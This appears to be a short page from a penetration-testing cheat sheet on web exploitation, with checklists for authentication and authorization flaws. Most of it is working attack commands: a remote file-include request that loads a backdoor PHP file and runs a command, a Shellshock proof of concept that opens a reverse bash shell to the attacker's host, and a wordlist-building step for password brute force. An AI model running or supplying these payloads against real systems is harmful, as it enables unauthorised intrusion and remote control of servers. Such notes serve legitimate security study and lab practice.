Exploitation

WebShell

File Include

curl http://target/?page=http://php/backdoor.php&cmd=id

Shellshock POC

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh

Virtual hosting

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).

Brute Force Password

Create Passwd Directory

cewl -m 5 http://$ip/joomla/ > passwd.txt

Authentication

  1. Check cookies

  2. Check "admin" and "Admin", "admin " and "admin"

  3. Check the redirection

Authorization

  1. Check IDOR

  2. Check .js, .json

  3. Check Object-relational mapping (&admin[admin]=1)

PreviousEnumerationNextExecute Commands

Last updated